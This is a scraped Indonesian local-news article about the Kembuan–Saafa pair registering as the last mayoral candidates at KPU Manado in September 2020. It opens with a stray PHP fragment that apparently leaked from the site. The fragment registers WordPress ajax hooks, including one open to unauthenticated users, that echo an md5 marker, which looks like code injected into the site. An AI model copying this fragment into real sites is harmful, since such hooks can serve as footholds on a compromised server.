function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Paslon Kembuan – Saafa Pendaftar Terakhir di KPU Manado – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

MANADO · 6 Sep 2020 21:05 WIB ·

Paslon Kembuan – Saafa Pendaftar Terakhir di KPU Manado


					Paslon Kembuan – Saafa Pendaftar Terakhir di KPU Manado Perbesar

MANADO – Hari terakhir pendaftaran bakal calon wali kota dan wakil wali kota di kantor KPU Manado ditutup oleh bakal pasangan calon Sonya Silvana Kembuan (SSK) dan Syarifuddin Saafa (SS), Minggu (6/9/2020).

Bakal Paslon dengan jargon SSK-SS ini, saat mendaftar dikawal oleh ratusan pendukung militan yang mendampingi sejak penyerahan SK hingga proses pendaftaran di KPU Manado.

Sebelum memasuki kantor KPU Manado, bakal paslon menjalankan protap kesehatan dengan mencuci tangan dan pengecekan suhu tubuh oleh pihak keamanan.

Setelah itu, bakal paslon diberikan waktu untuk melakukan registrasi dan penyerahan berkas serta hasil pemeriksaan swab oleh kedokteran.

Paslon yang diusung Partai Golkar, Partai Keadilan Sejahtera, dan Hanura ini setelah mengikuti proses verifikasi oleh petugas KPU yang didamping Bawaslu dinyatakan lulus dan diterima oleh KPU Manado.

Setelah pendaftaran selesai, Paslon SSK-SS diberikan kesempatan untuk melakukan konferensi pers di halaman kantor KPU.

Saat memberikan pernyataan kepada wartawan, paslon SSK-SS mengucapkan terima kasih untuk dukungan dari kerabat dan masyarakat yang turut mensukseskan hingga pada saat pendaftaran ini.

“Hari ini sungguh bersejarah bagi saya karena bisa mendaftar sebagai calon wali kota bersama pak syarifuddin. Walaupun banyak lika-liku yang terjadi sebelum sampai ditahap ini, tapi satu hal positif yang kami dapati, masih banyak masyarakat yang mendukung kami, sekali lagi, terima kasih untuk segalanya,” kata SSK. (AuddyManoppo)

Artikel ini telah dibaca 0 kali

badge-check

Penulis

Baca Lainnya

Pemkot Manado Rolling Jabatan Kepsek dan Pengawas, Wawali Sualang: Tetap Fokus Bekerja

20 Maret 2024 - 15:30 WIB

Pemkot Manado Rolling Jabatan Pegawai Eselon III dan IV

5 Maret 2024 - 17:23 WIB

Dapil Sario – Malalayang Membara, Peluang Rebut 6 Kursi DPRD Manado

16 Februari 2024 - 12:51 WIB

Terkait Video Viral Pemindahan Kotak Suara ke Graha Gubernuran, Ini Kata KPU Manado

16 Februari 2024 - 11:31 WIB

Data Real Count 47 Kelurahan Masuk, Bang Ai Unggul Jauh atas Royke Anter

16 Februari 2024 - 01:06 WIB

Bawaslu Manado Diduga Kebablasan Awasi Kampanye Prabowo di Lapangan Koni

7 Februari 2024 - 22:13 WIB

Trending di MANADO